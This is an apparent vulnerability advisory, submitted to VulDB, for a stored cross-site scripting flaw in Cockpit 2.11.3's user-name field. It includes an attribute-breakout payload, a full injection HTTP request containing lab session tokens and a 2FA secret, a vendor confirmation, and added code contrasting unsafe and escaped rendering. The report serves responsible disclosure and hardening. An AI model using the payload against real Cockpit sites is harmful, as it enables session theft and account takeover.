| Title | agentejo cockpit 2.11.3 Cross Site Scripting |
|---|---|
| Description | Stored Cross-Site Scripting (XSS) in Cockpit (Version 2.11.3) |

Summary:
A stored Cross-Site Scripting (XSS) vulnerability was discovered in Cockpit (version 2.11.3). The vulnerability exists in the handling of the username field (name parameter) at the endpoint /system/users/save. Although basic <script> tags appear to be blocked, special characters, specifically double quotes ("), are not sanitized. This oversight allows the value to break out of the HTML attribute it is rendered into and inject malicious JavaScript via HTML event handlers, resulting in stored XSS.
Application Setup:
To replicate and confirm the vulnerability, the following Docker setup was used:
docker pull cockpithq/cockpit:pro-2.11.3-unit
docker run -p 80:80 cockpithq/cockpit:pro-2.11.3-unit
Impact:
Exploitation of stored XSS in this scenario could enable attackers to:
Execute arbitrary JavaScript in victim users' browsers.
Steal session cookies and sensitive information (cookies lack the HttpOnly flag).
Perform unauthorized actions on behalf of affected users.
Proof-of-Concept (PoC):
Injecting the following payload into the username:
Admin" onmouseover="alert(42)
results in the following vulnerable HTML being rendered:
<app-avatar size="30" name="Admin" onmouseover="alert(42)"></app-avatar>
Hovering over the avatar triggers JavaScript execution.
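The rendering defect above is a classic attribute-context injection: the display name is interpolated into an attribute value without attribute-level output encoding, so a double quote ends the name attribute and whatever follows becomes a new attribute. The following is an added example, not Cockpit's own code; the escapeAttr, renderAvatarUnsafe, renderAvatarSafe, attributeNames and hasEventHandlerAttribute functions are hypothetical, and only the `<app-avatar size="30" name="...">` markup shape and the PoC payload are taken from the advisory. It reproduces the broken markup from the unsafe pattern, shows the hardened rendering, and includes a small check that flags any on* attribute produced from a user-controlled value.

```javascript
// Added example (not Cockpit's own code): how the stored-XSS rendering in the
// report arises, and how attribute-level output encoding prevents it.
// The renderAvatar* helpers and escapeAttr are hypothetical; the markup
// shape <app-avatar size="30" name="..."> follows the advisory.

// Constructed payload, copied from the advisory's PoC.
const PAYLOAD = 'Admin" onmouseover="alert(42)';

// Encode the characters that can terminate or alter an HTML attribute value.
// Always quote attributes and encode &, <, >, " and ' so user data cannot
// close the quote and start a new attribute (the defect described above).
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: raw string interpolation into an attribute value.
function renderAvatarUnsafe(name) {
  return `<app-avatar size="30" name="${name}"></app-avatar>`;
}

// Hardened pattern: same template, but the value is attribute-encoded first.
function renderAvatarSafe(name) {
  return `<app-avatar size="30" name="${escapeAttr(name)}"></app-avatar>`;
}

// Defensive check usable in a code review or unit test: list the attribute
// names that parse out of the element's opening tag. For a name value we
// expect exactly two (size and name); a third means the value broke out of
// its quotes.
function attributeNames(markup) {
  const open = markup.slice(0, markup.indexOf('>'));
  const names = [];
  const re = /\s([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*"/g;
  let m;
  while ((m = re.exec(open)) !== null) names.push(m[1]);
  return names;
}

// True if the rendered markup carries any on* event-handler attribute,
// which a user-controlled display name should never be able to produce.
function hasEventHandlerAttribute(markup) {
  return attributeNames(markup).some((n) => /^on/i.test(n));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderAvatarUnsafe(PAYLOAD)); // reproduces the advisory's markup
  console.log(renderAvatarSafe(PAYLOAD));   // single, harmless name attribute
}
```

In a framework template the equivalent fix is to bind the value as data (for example `setAttribute('name', value)` or a framework's attribute binding) rather than concatenating it into an HTML string; the escapeAttr function covers the case where string templating cannot be avoided.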
HTTP request used to inject the payload:
POST /system/users/save HTTP/1.1
Host: 127.0.0.1
Content-Length: 333
sec-ch-ua-platform: "Linux"
X-CSRF-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc3JmIjoiYXBwLmNzcmYuZmRjZGVkYTVlODdiNDY4MmJiMjQ0OTQzNWQwMTU5OGFjZDc0Njc1ZjdiYzM0YWY1MjY2MDNmNzFmNDcwYmUxZSJ9.wZcnZTP86PYoPkZMUFNoIoNB7qNcxx_BKU8IWffNdd4
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json; charset=UTF-8
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/system/users/user
Accept-Encoding: gzip, deflate, br
Cookie: azuriom_locale=en; 5ae2ad4c5addb4171a3413defb13ef9f=06034f74fba51176dc0df2a93f6e142c; 40d1b2d83998fabacb726e5bc3d22129=2c332589afc11b2cbf254a7d2d3b5bb5
Connection: keep-alive
{"user":{"active":true,"user":"admin","name":"Admin\" onmouseover=\"alert(42)","email":"[email protected]","i18n":"en","role":"admin","theme":"auto","_modified":1751016885,"_created":1751010682,"_id":"685e4d7a6ff7246c990a3090","twofa":{"enabled":false,"secret":"BD67DK7WQUF52S5N4XDHY7OJKNJHNWSH"},"_meta":{}},"password":"9zigBqaTs8z5"}
Additional Evidence:
Screenshots illustrating vulnerability exploitation are available via the following links (should be valid for 6 months):
https://ibb.co/7d3jKCCz
https://ibb.co/BH8dPmbF
https://ibb.co/3yFD2XCJ
https://ibb.co/ZpJ79kWM
https://ibb.co/twb0mX1m
https://ibb.co/P31LRpt
https://ibb.co/xSnR16Wh
https://ibb.co/qLN0bqV5
https://ibb.co/PzxPQDKQ
Vendor Response:
The Cockpit development team acknowledged the vulnerability, confirmed its existence, and noted the issue has been patched in the development branch. A fix is scheduled for release within the next week.
Vendor Email:
"Thank you very much for taking the time to report this issue and for providing a clear and detailed explanation.
I’ve reviewed your findings and can confirm the vulnerability. The issue has already been addressed in the development branch and the fix will be included in the upcoming release scheduled for next week.
I appreciate your responsible disclosure and commitment to improving the security of the application.
Best regards, Artur"
Reported by: Matan Sandori ([email protected])

| Field | Value |
|---|---|
| User | MatanS (UID 86894) |
| Submission | 27.06.2025 18:57 (10 months ago) |
| Moderated | 03.07.2025 21:49 (6 days later) |
| Status | Accepted |
| VulDB Entry | 314819 [Cockpit up to 2.11.3 /system/users/save name/email Cross Site Scripting] |
| Points | 17 |